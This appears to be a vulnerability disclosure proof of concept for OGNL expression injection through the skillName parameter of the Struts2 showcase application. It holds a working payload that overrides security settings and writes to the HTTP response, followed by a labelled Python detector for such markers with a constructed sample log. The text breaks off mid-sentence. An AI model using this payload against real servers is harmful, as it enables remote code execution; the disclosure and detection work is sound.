Proof of concept
Run struts2-showcase
Open the URL: http://localhost:8080/struts2-showcase/skill/edit.action?skillName=SPRING-DEV
Enter an expression of the form %{expr} as the skill name, for example:
%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.MethodAccessor.denyMethodExecution']=false) #hackedbykxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println('hacked by kxlzx'),#hackedbykxlzx.close())}
submit the form
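The steps above inject an expression through the skillName parameter. As an added detection example (not part of this proof of concept), the following scans request query strings for the %{...} / ${...} evaluation markers and the _memberAccess / MethodAccessor names the payload relies on; the log lines and log format are constructed for the example.

```python
"""Flag request parameters that carry OGNL expression markers.

Added example, not from the original proof of concept. Values are
URL-decoded (twice, to catch double encoding) before matching, because
a %{...} marker is frequently sent as %25%7B...%7D. Form bodies (POST)
are not visible in a URL-only log and need the same check at the
application layer.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Markers that have no business appearing in a plain skill name.
OGNL_PATTERNS = [
    re.compile(r"[%$]\{"),                                  # %{...} / ${...}
    re.compile(r"#_memberAccess", re.I),                    # security-manager override
    re.compile(r"MethodAccessor\.denyMethodExecution", re.I),
    re.compile(r"@[\w.]+@\w+"),                             # @class@staticMethod
]


def suspicious_params(url):
    """Return names of query parameters whose decoded name or value matches a marker."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        for text in (name, value):
            decoded = unquote(unquote(text))
            if any(p.search(decoded) for p in OGNL_PATTERNS):
                hits.append(name)
                break
    return hits


def scan_log(lines):
    """Return (line_no, [param names]) for each line whose URL carries a marker."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        parts = line.split()          # constructed format: METHOD URL STATUS
        if len(parts) < 2:
            continue
        hits = suspicious_params(parts[1])
        if hits:
            findings.append((line_no, hits))
    return findings


# Constructed sample log: one benign request, two with encoded markers, one
# with a bare percent sign that must not trigger.
SAMPLE_LOG = [
    "GET /struts2-showcase/skill/edit.action?skillName=SPRING-DEV 200",
    "POST /struts2-showcase/skill/save.action?skillName=%25%7B1%2B1%7D 302",
    "GET /struts2-showcase/skill/edit.action?skillName=%24%7Bfoo%7D 200",
    "GET /struts2-showcase/index.action?q=100%25%20sure 200",
]
```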
For the issue to be exploitable, the action needs a redirect result defined as the following: